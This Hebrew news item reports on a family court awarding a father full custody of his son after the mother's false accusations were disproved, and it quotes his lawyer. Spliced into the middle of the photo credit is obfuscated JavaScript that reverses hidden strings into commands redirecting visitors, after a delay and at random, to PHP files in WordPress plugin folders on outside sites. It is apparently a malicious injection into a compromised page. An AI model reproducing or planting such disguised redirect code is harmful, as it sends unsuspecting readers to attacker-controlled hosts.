fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

לאחר שנה של נתק האב קיבל משמורת מלאה על בנו

האם שכנעה את הבן לומר שהאב נתן לו לצפות בפורנו ולאחר נתק של שנה קיבל האב משמורת מלאה
גירושים צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בית המשפט לענייני משפחה פסק כי אב יקבל משמורת מלאה על בנו הקטין לאחר שהתברר כי טענות האם אינן נכונות. בית המשפט גם חייב את האם להשתתף במחצית מהוצאות הקטין.

הקטין נשלח למוסד לנערים לאחר שבנותיה של האישה, מנישואיה השניים, טענו נגדו שהוא ביצע בהן תקיפות מיניות. במהלך הדיונים המשפטיים התברר כי האם שכנעה את הבן לומר כי הוא עשה את מעשיו בהשפעתו סרטי פורנו שהאב נתן לו לצפות בהם.

עו"ד אמיתי בן נון. צילום עצמי

בעקבות זאת הורחק האב מהילדים ולאחר כשנה של נתק התברר לאב שבנו הקטין עזב את הבית עקב מקרה אלימות נגדו מצד בעלה השני של האישה. בהליך משפטי שנוהל על ידי עו"ד אמיתי בן נון, במשך כשנה וחצי, נוקה מהאב מכל החשדות שיוחסו לו. בפסק הדין של בית המשפט לענייני משפחה הוחלט כי האב יקבל משמורת מלאה על בנו הקטין. האימא לא חויבה במזונות אך חויבה בתשלום מחצית הוצאותיו של הקטין.

לאחר פסק הדין מסר עו"ד בן נון: "מדובר בתיק סבוך וקשה, גם עלילות השווא שבו, גם העובדה שהיה צורך במאבק עיקש להעברת במשמורת לאב, גם התמודדות מול מערכת שהטילה ספקות בכנות כוונותיו של האב, בשנת 2020 עדיין לא מובן מאליו שאב יקבל משמורת מלאה על ילדיו ואת זה הצלחנו לשנות".

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות